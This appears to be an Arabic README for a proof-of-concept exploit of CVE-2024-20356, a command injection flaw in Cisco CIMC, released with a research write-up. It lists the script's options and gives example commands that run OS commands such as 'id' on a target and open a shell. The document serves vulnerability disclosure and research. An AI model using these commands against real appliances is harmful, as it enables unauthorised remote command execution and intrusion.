
هذا هو إثبات المفهوم لـ CVE-2024-20356، وهي ثغرة حقن أوامر في CIMC من Cisco.
هذا دليل على إثبات الفكرة لثغرة CVE-2024-20356، وهي ثغرة Command Injection في Cisco CIMC.
يمكن العثور على التفاصيل التقنية الكاملة في https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom
Usage: CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
options:
-h, --help Show this help message and exit
-t HOST, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-u USERNAME, --username USERNAME
Username (default: admin)
-p PASSWORD, --password PASSWORD
Password (default: cisco)
-a ACTION, --action ACTION
Action: test, cmd, shell, dance (default: test)
-c CMD, --cmd CMD OS command to run (Default: NONE)
-v, --verbose Displays more information about cimc
أمثلة للأوامر:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
استخدم الوسيط --help للحصول على تعليمات الاستخدام الكاملة.
هذا الدليل التجريبي هو لأغراض العرض التوضيحي فقط ولا ينبغي استخدامه في أنشطة غير قانونية. شركة LRQA Nettitude ليست مسؤولة عن أي ضرر ناتج عن استخدام أو سوء استخدام هذا الكود.